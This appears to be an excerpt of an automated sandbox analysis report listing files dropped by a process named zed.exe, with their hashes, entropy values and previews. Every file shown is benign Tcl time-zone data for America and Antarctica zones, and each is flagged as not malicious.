                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9815
                                                                                                                                                                                                                                            Entropy (8bit):3.8481935495337356
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:sOR864CjSAG5a9bFzN6IkWq/WHQt/RY4yP:sO664CjSAGYbGBt/M
                                                                                                                                                                                                                                            MD5:9423BC81647BC4C37888860CE0518BBB
                                                                                                                                                                                                                                            SHA1:37E6E6554576D1DD36C3494EAF0BD169003D870D
                                                                                                                                                                                                                                            SHA-256:00B5FB8F37DFF43925C501AEAB039F39F058E002572C4203286317046CC1D700
                                                                                                                                                                                                                                            SHA-512:1830CA2B62B7CA6EEB5A924D2148925DF7DD87A7B93B21F4F023E4678EF42DC20BFF57F702923E10F4382FE6757323D21414D094E99FEEB43316DE4A7E5A909E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Vancouver) {.. {-9223372036854775808 -29548 0 LMT}.. {-2713880852 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-747237600 -25200 1 PDT}.. {-733935600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-4
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                            Entropy (8bit):4.914983069791254
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290RXgr490ppv:MByMYbpwt290xg090b
                                                                                                                                                                                                                                            MD5:9F7DA15BE387B8F7DEC5DFFE069F3505
                                                                                                                                                                                                                                            SHA1:D298B963B0048E9ECA3BC7B85248506AB1388479
                                                                                                                                                                                                                                            SHA-256:561D9D04B0CE0F96A9C351C7D5C30AA1D5A42A3D70066CD9AF0DA6CBC5388DBE
                                                                                                                                                                                                                                            SHA-512:606C2A918633C74BD2954D39B00EFA2CD9DA852BC7034F129A04258A65DC74942FA0826E9BC6E4433926E7F1375612554B04845077E434D0CD3BD15832DC6B95
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Virgin) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2971
                                                                                                                                                                                                                                            Entropy (8bit):3.9652694533791917
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5CeFvmpn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5BmCKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                                                                                                                            MD5:2F2D39B5FB844E170FA7B6AF11B948CA
                                                                                                                                                                                                                                            SHA1:3D89672134D979FCF65225A58249380D9C8A4A65
                                                                                                                                                                                                                                            SHA-256:8E0BC71BD7146145DDE3C064AE205DF08124FE2402853A9655B0EB799E90F31F
                                                                                                                                                                                                                                            SHA-512:6C046D1133C8CCF697C8FB553A1F539948F71FA80BA447B87AA8D1D1D7113B32A6B764C5C1734C615319A27961B6116FCA087EB571869119BE87656FCA351498
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Whitehorse) {.. {-9223372036854775808 -32412 0 LMT}.. {-2188997988 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9695
                                                                                                                                                                                                                                            Entropy (8bit):3.8209220355628766
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:pOEhc8/rvNZONqXXyIjNA604qSScBgN+4ctDzIVQ/c/3hNxTh:pY8DvbO+A604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:E8DB00D2B99B308018F4F5E48AC47C3A
                                                                                                                                                                                                                                            SHA1:8841467CB264DC9F87FABAADBE90EE2C8DACC80F
                                                                                                                                                                                                                                            SHA-256:F3FC5F6D93D1D9EB0F3DED33873F33C47F841797D96439966F8E0A5A189941FA
                                                                                                                                                                                                                                            SHA-512:5D684B07332ED53F9F8CB71FFF3B6D0F848426A5E4D9E7DA84E49E358C666F1C3BB9CF21352D939B35B558FC691839E24BC84656317F73C768B474AF5AC480EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Winnipeg) {.. {-9223372036854775808 -23316 0 LMT}.. {-2602258284 -21600 0 CST}.. {-1694368800 -18000 1 CDT}.. {-1681671600 -21600 0 CST}.. {-1632067200 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1029686400 -18000 1 CDT}.. {-1018198800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-746035200 -18000 1 CDT}.. {-732733200 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620755200 -18000 1 CDT}.. {-607626000 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8683
                                                                                                                                                                                                                                            Entropy (8bit):3.957710943557426
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:po1acs6yyyxC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:p4acsW9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:18EC35FCEC15CE9304818E22222411EF
                                                                                                                                                                                                                                            SHA1:F4A04B3E2B5F55C9582F578C3142E706C4EB6BD6
                                                                                                                                                                                                                                            SHA-256:79B44F245D86A4EC299D1A9A2EDB2AB92D50AB5A7C1C03759D283AC4070F9005
                                                                                                                                                                                                                                            SHA-512:40AC47AC278DF22C7ECFF568456E7C3767B38701B9A2E2639C2201DC53CDD794CF7521BCB773A8AF2A8D4A034D3BBD35BF9788FB5B4E4D51A7A139B3B3353479
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Yakutat) {.. {-9223372036854775808 52865 0 LMT}.. {-3225223727 -33535 0 LMT}.. {-2188953665 -32400 0 YST}.. {-883580400 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-757350000 -32400 0 YST}.. {-31503600 -32400 0 YST}.. {-21474000 -28800 1 YDT}.. {-5752800 -32400 0 YST}.. {9975600 -28800 1 YDT}.. {25696800 -32400 0 YST}.. {41425200 -28800 1 YDT}.. {57751200 -32400 0 YST}.. {73479600 -28800 1 YDT}.. {89200800 -32400 0 YST}.. {104929200 -28800 1 YDT}.. {120650400 -32400 0 YST}.. {126702000 -28800 1 YDT}.. {152100000 -32400 0 YST}.. {162385200 -28800 1 YDT}.. {183549600 -32400 0 YST}.. {199278000 -28800 1 YDT}.. {215604000 -32400 0 YST}.. {230727600 -28800 1 YDT}.. {247053600 -32400 0 YST}.. {262782000 -28800 1 YDT}.. {278503200 -32400 0 YST}.. {294231600 -28800 1 YDT}.. {30995
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7737
                                                                                                                                                                                                                                            Entropy (8bit):3.8656193813344064
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:42GaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:uPlLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:A7606AE597027C26BC90702B2BCC80E9
                                                                                                                                                                                                                                            SHA1:7B2AB2E0A23B8D770D1305A171DBCCE2D471EF2F
                                                                                                                                                                                                                                            SHA-256:B33838F12640C64BA4F10F50657EC4D8D5B30FD226DA4ACA21B169B53AD30576
                                                                                                                                                                                                                                            SHA-512:B18711B4110D6DB0CC7A6EF66639E1B38323F0B61DA4F5287A51BC9EC8534133568C6D3E4F18F6328564DAD291E0CA707768DE4478DD502A40FFD189C08114A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Yellowknife) {.. {-9223372036854775808 0 0 -00}.. {-1104537600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-147891600 -18000 1 MDDT}.. {-131562000 -25200 0 MST}.. {315558000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):478
                                                                                                                                                                                                                                            Entropy (8bit):4.205595904143294
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2L09xSDm2OHE5QMFUH+KNUoTVsBEE0ZZICxZbDtVby:MB862LcUmdHE5QMFi+KdTVPZIwXDy
                                                                                                                                                                                                                                            MD5:7D8132A23238C14CCEDD520BBEB49F77
                                                                                                                                                                                                                                            SHA1:A8BAE9269DAA2AC535B292E1AE8632B451A0BBA5
                                                                                                                                                                                                                                            SHA-256:04247ACB2B4FA126D13F4573FF74D15A89CF42B2C5CD7E688D5BB1C1FD3972BF
                                                                                                                                                                                                                                            SHA-512:74FCB14037B0AE11A95B036791D69037590F8EC7F09D90A866E6A6CAAD6D58E4EC3723A3BB356FBF0E25ED1239A5820A8513EBF6653578E4BFB8988D6D20EF13
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Casey) {.. {-9223372036854775808 0 0 -00}.. {-31536000 28800 0 +08}.. {1255802400 39600 0 +11}.. {1267714800 28800 0 +08}.. {1319738400 39600 0 +11}.. {1329843600 28800 0 +08}.. {1477065600 39600 0 +11}.. {1520701200 28800 0 +08}.. {1538856000 39600 0 +11}.. {1552752000 28800 0 +08}.. {1570129200 39600 0 +11}.. {1583596800 28800 0 +08}.. {1601740860 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):324
                                                                                                                                                                                                                                            Entropy (8bit):4.360007144607037
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2L0mDm2OHEfwz0/MVSYyF/KZ7VoX/MVSYyF/VpVQVF9RXhNXSMVSYy6:MB862LVmdHEIjsF/KZOksF/Vp6v9RRFl
                                                                                                                                                                                                                                            MD5:97AA556F7EF06786B76316133794F4E9
                                                                                                                                                                                                                                            SHA1:B3CDA284DE80987B954E2CC9BFA3ED33462CDD4F
                                                                                                                                                                                                                                            SHA-256:2F36D2E13D7E251322B7A7B30F39645393525CEB49A2B5C26F27797F2AAF4D7F
                                                                                                                                                                                                                                            SHA-512:14C6F17252C2AC89D86FE00BD8A8934D627C85478B0AB08AB6237988922D18616B00878498FFFC0E1978308BC6D775E2DC3ADCEF827AB0A06B214BE4DDABAB52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Davis) {.. {-9223372036854775808 0 0 -00}.. {-409190400 25200 0 +07}.. {-163062000 0 0 -00}.. {-28857600 25200 0 +07}.. {1255806000 18000 0 +05}.. {1268251200 25200 0 +07}.. {1319742000 18000 0 +05}.. {1329854400 25200 0 +07}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):214
                                                                                                                                                                                                                                            Entropy (8bit):4.938579775653117
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/2L0/3Zp5/4pv:MByMdNXiU5t2Lkwv
                                                                                                                                                                                                                                            MD5:CC22302B9FAE52E36A2A35C0361E774B
                                                                                                                                                                                                                                            SHA1:45CFD95A5821C4C4FDF2E1519F08029FF0BE664B
                                                                                                                                                                                                                                            SHA-256:96F2AB9A9FFCD10598FDF105F68460CC4B4EBC1F18054D1BC8E39DF6AD24D1AC
                                                                                                                                                                                                                                            SHA-512:FC9084D7B16EAA985681762F2658D32C77EE186D8D3C7225093CC5CB4A6AEB74A3D0A41A904EB6C8AEF7DB110A89497BAFAF811BBC26103F96E5E1D4D4E1002A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Antarctica/DumontDUrville) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8447
                                                                                                                                                                                                                                            Entropy (8bit):3.850137279218428
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:s1qigkx6WsYyS391QiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:s1q05h1QiAmcOM6e0pj
                                                                                                                                                                                                                                            MD5:81C612A1544910544173687C416841C6
                                                                                                                                                                                                                                            SHA1:4A707B403F0B9556A3D3D50B08BE0F56660F3F0B
                                                                                                                                                                                                                                            SHA-256:C4EA7F1C0B5A0FAE653419F1C6D058BDDD745A3CDBA11900005C157DF23DDC01
                                                                                                                                                                                                                                            SHA-512:122E2DC3D8D61CCDB83E03C9487DD29AABE7AB3F71FE4F6315209AF0BBCFD01FBDC3A1E3F6D910FB0D690378DF852170A9819D8C1EF96BE6BC8C0811BFB453A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Macquarie) {.. {-9223372036854775808 0 0 -00}.. {-2214259200 36000 0 AEST}.. {-1680508800 39600 1 AEDT}.. {-1669892400 39600 0 AEDT}.. {-1665388800 36000 0 AEST}.. {-1601719200 0 0 -00}.. {-94730400 36000 0 AEST}.. {-71136000 39600 1 AEDT}.. {-55411200 36000 0 AEST}.. {-37267200 39600 1 AEDT}.. {-25776000 36000 0 AEST}.. {-5817600 39600 1 AEDT}.. {5673600 36000 0 AEST}.. {25632000 39600 1 AEDT}.. {37728000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {28932480
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.7511104559982
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2L0GRHEzyeyFNMXGm2OHvavFeVU/VPKVVFSTVF9svUX0VQr:SlSWB9eg/2L0zyfXDm2OHEVy/Ur9s/Vg
                                                                                                                                                                                                                                            MD5:7A2AD9BD8F8DEE5C600CABF2D5E9D07B
                                                                                                                                                                                                                                            SHA1:CF5D230A29946B7FA3ECD8EB99F1EF1BF0FA5B50
                                                                                                                                                                                                                                            SHA-256:ACA533B8BC82296373EDEC82F6E0AA45A34D817C7C18FF5E8E94B81C0BD30259
                                                                                                                                                                                                                                            SHA-512:95F8FA68735E88AB15C403191928FA4AA5D1628453BE64B87EE7E8DF9F35FB5DA74A3CED5F5289A13D84A8A12BBB86734E578059CA8B6405399CFF5E33C9384C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Mawson) {.. {-9223372036854775808 0 0 -00}.. {-501206400 21600 0 +06}.. {1255809600 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):195
                                                                                                                                                                                                                                            Entropy (8bit):4.880387042335617
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0z6/fy:MByMdTiYt2LrK
                                                                                                                                                                                                                                            MD5:88EE32AE5C538AEBFDE2D1D944ED5B2B
                                                                                                                                                                                                                                            SHA1:55E7234E6FFF298182A6C8889A9F506CDCE7C959
                                                                                                                                                                                                                                            SHA-256:E9D99293C5B275D8E0D7B066084177EDF670D5B52B81E87608BAB02025F33155
                                                                                                                                                                                                                                            SHA-512:45A3EA146CA719BA6F22E99EAA57AC1DED1C762E19BDFBA176E5FEAC36EC58586F771572DD16ACE09E660F97DEB91A701BA1B1F1AEF3BD8688F3451C0772420A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/McMurdo) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2613
                                                                                                                                                                                                                                            Entropy (8bit):3.6082359166067905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5fzJS6S4wRSenSOaf7HSKSkSqS7STslSmSMSCSxygSiXS/SrS+S9SfShS7SoSlSL:jdeRtnxaf7HlPlgiot7JC/Xk8NWse4rf
                                                                                                                                                                                                                                            MD5:BDFA5908E735F866FEC16F6B481AD385
                                                                                                                                                                                                                                            SHA1:524AEE21BB97D923A8812A5722AF2FEA43B4D971
                                                                                                                                                                                                                                            SHA-256:1637381A20E9D5C6A530F110BDB08D9515E675C9206F000407D8511074948E61
                                                                                                                                                                                                                                            SHA-512:3D65C7941BA15A698264848F9B6F43ED5B63D4CF86D495334E8E1DC381D63435E9424BBBC389229693D20044FDB8425A7CC805AB5EA055F59D3E0DD4C7AC2A28
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Palmer) {.. {-9223372036854775808 0 0 -00}.. {-157766400 -14400 0 -04}.. {-152654400 -14400 0 -04}.. {-132955200 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-101419200 -10800 1 -04}.. {-86821200 -14400 0 -04}.. {-71092800 -10800 1 -04}.. {-54766800 -14400 0 -04}.. {-39038400 -10800 1 -04}.. {-23317200 -14400 0 -04}.. {-7588800 -10800 0 -03}.. {128142000 -7200 1 -03}.. {136605600 -10800 0 -03}.. {389070000 -14400 0 -04}.. {403070400 -10800 1 -04}.. {416372400 -14400 0 -04}.. {434520000 -10800 1 -04}.. {447822000 -14400 0 -04}.. {466574400 -10800 1 -04}.. {479271600 -14400 0 -04}.. {498024000 -10800 1 -04}.. {510721200 -14400 0 -04}.. {529473600 -10800 1 -04}.. {545194800 -14400 0 -04}.. {560923200 -10800 1 -04}.. {574225200 -14400 0 -04}.. {592372800 -10800 1 -04}.. {605674800 -14400 0 -04}.. {624427200 -10800 1 -04}.. {63712
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):151
                                                                                                                                                                                                                                            Entropy (8bit):4.829975802206526
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2L0GRHEsKRsMXGm2OHvavFN/H3VVFVGAvFv:SlSWB9eg/2L0rRsDm2OHEN/VVFAKV
                                                                                                                                                                                                                                            MD5:C330982049AA053DA62B926627D2F2FA
                                                                                                                                                                                                                                            SHA1:050CE68265F1A183F0173C825AC59EAE8B6AB9EB
                                                                                                                                                                                                                                            SHA-256:943F10D8E836773F0B7ACD13ED8422C0B27813C7BBE0B09B57697D1D70D21ECE
                                                                                                                                                                                                                                            SHA-512:DE9953D0E505D6B110C0CC4E756B5B0311646C9CA4703A33B92147D36CFB4C288D73851E6766CE1432F41AB51B5D0A1D58680BDB4E28F067E1D36F670B4A192E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Rothera) {.. {-9223372036854775808 0 0 -00}.. {218246400 -10800 0 -03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                                                            Entropy (8bit):4.906125935761354
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0tlo+ply:MByMdTiYt2LMq+p8
                                                                                                                                                                                                                                            MD5:8095A3749DBDE05377836D74A4EEFE33
                                                                                                                                                                                                                                            SHA1:6987CA972B63AE26A65654961588D51D3EF2166C
                                                                                                                                                                                                                                            SHA-256:88057832175BB642B23FC99F788A2F78A24005CF1F84A7B1B5E8C84FB8F4D4C1
                                                                                                                                                                                                                                            SHA-512:9066104C9C16D2AB88523D651C74CE268468E093A497D128D0D12A986BD62DBC1388A56ED1737C2AFACF04185CF06FD0EE66797A3390B2F0E1EB08A4D92AAFAD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/South_Pole) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.871844665431957
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2L0GRHEtWlFBQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2L0tQB
                                                                                                                                                                                                                                            MD5:CA52057130DCF506D11A7CC069F4FBA3
                                                                                                                                                                                                                                            SHA1:2C38B7E7872BB41C3569DFCB539C3EC3AAE24FDD
                                                                                                                                                                                                                                            SHA-256:2488805DE4FEA42305689F679F1AE2D80B1E934E657FEA329AD39A82DAC63022
                                                                                                                                                                                                                                            SHA-512:B19D409870939C8F0834C6C028239E010EE5128DFA6E97D4903BECA229B04FE530EA376B936767D9BFE21709720C1791289D8E3622B17C18F2680B0670794A02
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Antarctica/Syowa) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5370
                                                                                                                                                                                                                                            Entropy (8bit):3.5134546899897146
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:YveRdmbxnKIJqU9XThVIsopb8BcrFgoZVlzeEG+PtJ:UeRdmNnKIIajfopb3FVVJ
                                                                                                                                                                                                                                            MD5:442F495C36B31CA5D7A9BEFF12105AEF
                                                                                                                                                                                                                                            SHA1:B3F6CA5B4A5756F9B2C09A27198F7A651CC6032D
                                                                                                                                                                                                                                            SHA-256:6FD5AB8B7B308CDCEA4B747A81D8675988AE218813C91714FC4CA97919CEBEA5
                                                                                                                                                                                                                                            SHA-512:C6EAECC26D67D218615EBB5602639DAB62A2578BD9683553D765DC1AC5580627D29B6F911388F5F1BFC284278EA4EBECE94630D3C6B95FF9EF93D3D61A3C2028
                                                                                                                                                                                                                                            Malicious:false
